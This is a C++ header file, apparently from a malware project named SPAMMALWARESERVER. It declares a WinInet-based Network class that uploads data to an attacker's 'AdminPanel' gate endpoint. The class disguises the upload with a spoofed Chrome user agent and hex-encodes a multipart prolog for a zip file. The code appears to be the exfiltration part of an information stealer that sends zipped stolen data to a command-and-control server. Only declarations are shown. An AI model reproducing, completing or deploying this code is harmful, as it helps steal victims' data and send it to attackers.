#ifndef SPAMMALWARESERVER_NETWORK_H
#define SPAMMALWARESERVER_NETWORK_H

#include <string>
#include <vector>
#include <cstdint>
#include <Windows.h>
#include <WinInet.h>

class Network
{
public:
    explicit Network(const std::string& AdminPanel);
    Network() = delete;
    bool SendData(const std::vector<uint8_t>& data) const;
    ~Network() noexcept ;

    Network(const Network&) = delete;
    Network(Network&&) = delete;
    Network& operator=(const Network&) = delete;
    Network& operator=(Network&&) = delete;

private:
    const std::string RequestType = "POST";
    const std::string RequestValue = "api/gate.get?p1=0&p2=0&p3=0&p4=0&p5=0&p6=0&p7=0";
    const std::string UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36";
    const std::string Headers = "Content-Type: multipart/form-data; boundary=---------------------------7d82751e2bc0858";
    const std::vector<uint8_t> Prolog {
            0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D,
            0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x2D, 0x37, 0x64, 0x38,
            0x32, 0x37, 0x35, 0x31, 0x65, 0x32, 0x62, 0x63, 0x30, 0x38, 0x35, 0x38, 0x0D, 0x0A, 0x43, 0x6F,
            0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x44, 0x69, 0x73, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F,
            0x6E, 0x3A, 0x20, 0x66, 0x6F, 0x72, 0x6D, 0x2D, 0x64, 0x61, 0x74, 0x61, 0x3B, 0x20, 0x6E, 0x61,
            0x6D, 0x65, 0x3D, 0x22, 0x66, 0x69, 0x6C, 0x65, 0x22, 0x3B, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x6E,
            0x61, 0x6D, 0x65, 0x3D, 0x22, 0x37, 0x36, 0x30, 0x36, 0x36, 0x38, 0x34, 0x32, 0x32, 0x2E, 0x7A,
            0x69, 0x70, 0x22, 0x0D, 0x0A, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x54, 0x79, 0x70,
            0x65, 0x3A, 0x20, 0x61, 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x2F, 0x6F,
            0x63, 0x74, 0x65, 0x74, 0x2D, 0x73, 0x74, 0x72, 0x65, 0x61, 0x6D, 0x0D, 0x0A, 0x0D, 0x0A
    };

    HINTERNET inet;
    HINTERNET connection;
};

#endif //SPAMMALWARESERVER_NETWORK_H
